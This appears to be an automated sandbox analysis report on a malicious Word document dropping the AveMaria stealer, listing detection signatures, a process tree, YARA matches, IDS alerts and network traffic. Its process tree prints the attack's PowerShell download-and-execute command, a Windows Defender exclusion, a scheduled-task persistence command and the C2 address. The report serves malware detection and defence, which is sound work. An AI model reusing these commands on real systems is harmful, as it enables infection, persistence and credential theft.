
Windows Analysis Report
Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc

Overview

General Information

Sample Name: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc
Analysis ID: 708250
MD5: 9bc102ffb0930f5dee65bde8e0ba6d89
SHA1: 37cac7507a6ad02a75d947a9bdfe115f2da8b71b
SHA256: 959837140aee207e9fd845a030881f9430364d2df8088845f5828579420b1717
Tags: doc

Detection

AveMaria, UACMe
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (drops PE files)
Yara detected AntiVM3
Document exploit detected (creates forbidden files)
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Scheduled temp file as task from temp location
Yara detected UACMe UAC Bypass tool
Yara detected AveMaria stealer
Document contains OLE streams with names of living off the land binaries
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Powershell drops PE file
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Uses schtasks.exe or at.exe to add and modify task schedules
Drops PE files with benign system names
Microsoft Office creates scripting files
Office process drops PE file
Injects files into Windows application
Writes to foreign memory regions
Increases the number of concurrent connection per server for Internet Explorer
Bypasses PowerShell execution policy
Contains functionality to hide user accounts
Tries to download and execute files (via powershell)
Suspicious powershell command line found
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Found suspicious RTF objects
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
HTTP GET or POST without a user agent
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Binary contains a suspicious time stamp
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Internet Provider seen in connection with other malware
Yara detected Credential Stealer
Potential document exploit detected (performs DNS queries)
Enables debug privileges
AV process strings found (often used to terminate AV products)
Installs a raw input device (often for capturing keystrokes)
Detected TCP or UDP traffic on non-standard ports
Potential document exploit detected (performs HTTP gets)

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 956 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • powershell.exe (PID: 1624 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 264 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • explorer.exe (PID: 2360 cmdline: C:\Users\user\AppData\Roaming\explorer.exe MD5: 87B246B26208A9831A4372664C518C2C)
        • powershell.exe (PID: 2580 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
        • schtasks.exe (PID: 2220 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpE14B.tmp MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
        • MSBuild.exe (PID: 568 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 7FB523211C53D4AB3213874451A928AA)
        • MSBuild.exe (PID: 2040 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 7FB523211C53D4AB3213874451A928AA)
    • powershell.exe (PID: 1312 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 2540 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • explorer.exe (PID: 676 cmdline: C:\Users\user\AppData\Roaming\explorer.exe MD5: 87B246B26208A9831A4372664C518C2C)
        • powershell.exe (PID: 2948 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
        • schtasks.exe (PID: 2172 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmp6336.tmp MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
        • MSBuild.exe (PID: 1228 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 7FB523211C53D4AB3213874451A928AA)
    • powershell.exe (PID: 2072 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 904 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • explorer.exe (PID: 1248 cmdline: C:\Users\user\AppData\Roaming\explorer.exe MD5: 87B246B26208A9831A4372664C518C2C)
        • powershell.exe (PID: 1448 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
        • schtasks.exe (PID: 2448 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpFA37.tmp MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
        • MSBuild.exe (PID: 2884 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 7FB523211C53D4AB3213874451A928AA)
    • verclsid.exe (PID: 900 cmdline: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5 MD5: 3796AE13F680D9239210513EDA590E86)
    • notepad.exe (PID: 2520 cmdline: C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT MD5: B32189BDFF6E577A92BAA61AD49264E6)
  • cleanup
Malware Configuration (AveMaria): {"C2 url": "20.126.95.155", "port": 7800}
Yara rule matches (Source, Rule, Description, Author, Strings):

Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc, Rule: INDICATOR_RTF_Exploit_Scripting, Description: detects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents., Author: ditekSHen, Strings:
  • 0x8c12:$clsid2: 0003000000000000C000000000000046
  • 0x8370:$ole6: D0Cf11E
  • 0x7cd:$obj2: \objdata
  • 0x8325:$obj2: \objdata
  • 0x8311:$obj3: \objupdate
  • 0x828c:$obj4: \objemb
  • 0x9890:$obj4: \objemb
  • 0x827b:$obj6: \objlink
  • 0x8e0:$sct1: 33 43 37 33 36 33 37 32 36 39 37 30 37 34 36 43 36 35 35 34
Source: 00000011.00000003.964034718.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Author: Florian Roth, Strings:
  • 0xa8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0xa8:$c1: Elevation:Administrator!new:
Source: 00000011.00000003.964034718.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Author: Joe Security
Source: 00000013.00000002.962831144.0000000001B86000.00000004.00000020.00020000.00000000.sdmp, Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Author: Florian Roth, Strings:
  • 0x949:$s3: System.Net.WebClient).DownloadFile('httP
Source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Author: Joe Security
Source: 17.3.MSBuild.exe.6a5d90.1.unpack, Rule: Codoso_Gh0st_2, Description: Detects Codoso APT Gh0st Malware, Author: Florian Roth, Strings:
  • 0xb18:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
Source: 17.3.MSBuild.exe.6a5d90.1.unpack, Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Author: Florian Roth, Strings:
  • 0xb18:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0xb18:$c1: Elevation:Administrator!new:
Source: 17.3.MSBuild.exe.6a5d90.1.unpack, Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Author: Joe Security
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, Rule: Codoso_Gh0st_2, Description: Detects Codoso APT Gh0st Malware, Author: Florian Roth, Strings:
  • 0x4c728:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Author: Florian Roth, Strings:
  • 0x4c728:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x4c728:$c1: Elevation:Administrator!new:

          Persistence and Installation Behavior

Source: Process started, Author: Joe Security, Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpE14B.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpE14B.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\explorer.exe, ParentImage: C:\Users\user\AppData\Roaming\explorer.exe, ParentProcessId: 2360, ParentProcessName: explorer.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpE14B.tmp, ProcessId: 2220, ProcessName: schtasks.exe
Snort IDS alerts:

Timestamp: 09/23/22-08:15:52.235686
Source IP: 20.126.95.155
Destination IP: 192.168.2.22
SID: 2852329
Source Port: 7800
Destination Port: 49173
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 09/23/22-08:15:32.226881
Source IP: 20.126.95.155
Destination IP: 192.168.2.22
SID: 2852326
Source Port: 7800
Destination Port: 49173
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 09/23/22-08:15:32.237815
Source IP: 192.168.2.22
Destination IP: 20.126.95.155
SID: 2852328
Source Port: 49173
Destination Port: 7800
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 09/23/22-08:13:32.180190
Source IP: 20.126.95.155
Destination IP: 192.168.2.22
SID: 2036735
Source Port: 7800
Destination Port: 49173
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 09/23/22-08:15:32.237815
Source IP: 192.168.2.22
Destination IP: 20.126.95.155
SID: 2036734
Source Port: 49173
Destination Port: 7800
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 09/23/22-08:13:32.470320
Source IP: 192.168.2.22
Destination IP: 20.126.95.155
SID: 2852327
Source Port: 49173
Destination Port: 7800
Protocol: TCP
Classtype: A Network Trojan was detected


          AV Detection

Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc, ReversingLabs: Detection: 32%
Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc, Virustotal: Detection: 50%
Source: Yara match, File source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE
Source: Yara match, File source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Roaming\eDdYRRbouy.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\explorer.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\explorer[1].exe, Joe Sandbox ML: detected
Source: 8.2.explorer.exe.3a2b638.11.unpack, Avira: Label: TR/AD.MortyStealer.utbzg
Source: 17.0.MSBuild.exe.400000.0.unpack, Avira: Label: TR/Redcap.ghjpt
Source: 00000011.00000003.963762920.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: AveMaria {"C2 url": "20.126.95.155", "port": 7800}

          Exploits

Source: Yara match, File source: 17.3.MSBuild.exe.6a5d90.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE
Source: Yara match, File source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000011.00000003.964034718.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000003.964229410.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000000.957645359.000000000054F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: explorer.exe PID: 2360, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: MSBuild.exe PID: 2040, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: explorer.exe PID: 676, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: explorer.exe PID: 1248, type: MEMORYSTR
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Directory created: C:\Program Files\Microsoft DN1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

          Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File created: explorer[1].exe.0.dr
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File created: C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\explorer[1].exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
